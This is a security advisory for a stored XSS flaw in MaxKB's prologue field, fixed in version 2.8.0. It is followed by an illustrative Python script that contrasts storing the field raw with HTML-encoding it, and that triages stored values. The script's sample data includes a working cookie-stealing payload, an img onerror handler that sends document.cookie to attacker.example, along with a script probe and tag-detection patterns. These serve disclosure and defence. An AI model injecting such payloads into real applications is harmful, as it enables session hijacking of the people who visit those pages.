PT-2026-32584 · Maxkb · Maxkb
Liqiang-Fit2Cloud
Published 2026-04-14 · Updated 2026-04-14
CVE-2026-39425
CVSS v3.1: 5.4 (Medium)
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions
MaxKB versions prior to 2.8.0
Description
An authenticated user can inject arbitrary HTML and JavaScript into an application's prologue (Opening Remarks) field by wrapping the payload in HTML tags. When an application is created or updated through the '/admin/api/workspace/{workspace id}/application' endpoint, the backend neither sanitizes nor HTML-encodes the prologue and stores the raw payload in the database. The frontend then renders the stored value through an innerHTML-equivalent mechanism, so the payload becomes a stored (persistent) XSS that reaches the page through a DOM sink and executes in the browser of every visitor who opens the affected chatbot interface. Consequences include session hijacking, exposure of sensitive data, and actions performed with the victim's privileges, such as deleting workspaces or applications.
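The following Python block is an added illustration and is not MaxKB's code or its actual fix. It models the two write paths the description contrasts (storing the prologue verbatim versus HTML-encoding it before it is persisted) and adds a triage check that a practitioner can run over prologue values already sitting in the database, on the assumption, not stated in the advisory, that upgrading does not rewrite rows written before the fix. The sample prologues and the function names are constructed for this example.

```python
import html
import re

# Constructed sample prologue values, as an authenticated user could submit
# them in the "Opening Remarks" field. Index 0 and 3 are benign, 1 and 2 carry
# active content. These are not payloads from the advisory.
SAMPLE_PROLOGUES = [
    "Welcome! Ask me anything about our docs.",
    "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
    "<script>alert(document.domain)</script>",
    "Hello <b>there</b>",
]


def store_prologue_vulnerable(prologue: str) -> str:
    """Models the pre-2.8.0 behaviour the advisory describes: the value is
    persisted exactly as received, so whatever the frontend later assigns to
    innerHTML is attacker-controlled markup."""
    return prologue


def store_prologue_encoded(prologue: str) -> str:
    """Hardened variant (illustrative, not MaxKB's fix): HTML-encode the value
    at write time, so an innerHTML sink renders it as literal text. quote=True
    also encodes quotes, which matters inside attribute contexts."""
    return html.escape(prologue, quote=True)


# Heuristics for triaging stored values. They only look inside a literal tag
# ("<" followed by a tag name), so an HTML-encoded value never matches.
_TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9-]*)")
_EVENT_ATTR_RE = re.compile(r"<[a-zA-Z][^>]*\bon[a-z]+\s*=", re.IGNORECASE)
_JS_URI_RE = re.compile(
    r"<[a-zA-Z][^>]*\b(?:href|src)\s*=\s*['\"]?\s*javascript:", re.IGNORECASE
)

# Elements worth a manual look when they turn up in a free-text field. Note that
# <script> inserted through innerHTML does not execute per the HTML spec, but
# event-handler attributes (onerror, onload, ...) do; both are flagged because a
# renderer that differs from plain innerHTML may treat them differently.
_SUSPICIOUS_TAGS = {
    "script", "iframe", "object", "embed", "svg", "math", "link", "meta", "base", "form",
}


def looks_like_active_content(stored: str) -> bool:
    """Return True when a stored prologue contains markup that a browser could
    execute when assigned to innerHTML. Heuristic, not an HTML parser."""
    tags = {m.group(1).lower() for m in _TAG_RE.finditer(stored)}
    if tags & _SUSPICIOUS_TAGS:
        return True
    return bool(_EVENT_ATTR_RE.search(stored) or _JS_URI_RE.search(stored))


def triage(prologues):
    """Return (index, value) pairs from a list of stored prologues that need
    review. In practice the input would be the prologue column of the
    application table dumped after the upgrade."""
    return [(i, p) for i, p in enumerate(prologues) if looks_like_active_content(p)]


if __name__ == "__main__":
    for idx, value in triage(SAMPLE_PROLOGUES):
        print(f"row {idx}: review {value!r}")
    print("encoded form of row 1:", store_prologue_encoded(SAMPLE_PROLOGUES[1]))
```

Encoding at write time is only one placement for the fix; the equivalent client-side change is to render the prologue with a text sink (textContent, or v-text instead of v-html in a Vue frontend). If the product deliberately allows formatting in the prologue, full encoding would break that, and an allowlist sanitizer on the rendering side is the right tool instead. Note that the triage heuristic does not flag plain formatting such as `<b>`, which is harmless to execute but still evidence that the field was rendered as HTML.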
Recommendations
Update to version 2.8.0 or later.
Fix
XSS
Weakness Enumeration
Related Identifiers
Affected Products
Maxkb